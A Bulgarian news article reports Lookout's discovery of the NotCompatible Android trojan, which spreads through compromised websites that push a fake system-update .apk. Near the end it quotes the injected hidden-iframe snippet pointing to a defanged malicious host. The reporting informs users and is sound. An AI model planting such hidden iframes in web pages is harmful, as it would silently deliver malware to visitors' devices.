Компанията Lookout разкриха нов NotCompatible вирус за Андроид телефони и таблети

Компанията по сигурност на данни за мобилни телефони и устройства Lookout и производител на една от най-идобрите антивирусни Lookout Mobile Security, излезе с новината за предупреждение за нов вид Android телефони и таблети. Идентифициран като "NotCompatible", областа на разпространение на зловредният код е уеб браузъра на Android, който е вграден по подразбиране в мобилната операционна система за .

Преди да запознаем Андроид потребителите с някои факти, те не трябва да изпадат в масова паника. На първо място, зловредният код не изглежда да е толкова пагубен или поне не на този етап. Второ, NotCompatible не може да се инсталира на мобилния телефон без конкретна намеса на потребителя.

Въпреки, че троянските коне, вирусите и другите типове зловреден код най-общо казано локализират и атакуват слабите места на браузърите, до момента са констатирани много малко реални примери за атаки в света на мобилните телефони и устройства. Функцията на зловредният код NotCompatible всъщност не е манипулиране на уеб браузъра на Андроид телефоните, а нещо повече, основно се възползва от някои от възможните за манипулация не добрите решения в дизайна, за да подхлъзнат да го инсталират не до там запознатите Андроид потребители.

Работата на Android телефона или таблета, като маскиран файл за автоматично сваляне. Подобно на всички други вируси освен, че трябва да се изтегли файла, той също така трябва да се стартира (инсталира). След приключване на изтеглянето на файла, уеб сайтът изпраща сигнал чрез баузъра на потребителя за наличие на нов системен ъпдейт. В случай че нищо неподозиращите потребители се подведат, ще инсталират.apk файла и по този начин дават на NotCompatible достъп до мобилния телефон или устройство.

Зловредният код е вложен в долната част на всяка от заразените страници и изглежда така:

iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”

Въпреки че, в момента NotCompatible не се асоциира с конкретна заплаха, е възможно Андроид вируса да функционира като троянски кон или прокси за някаква по-лоша вреда.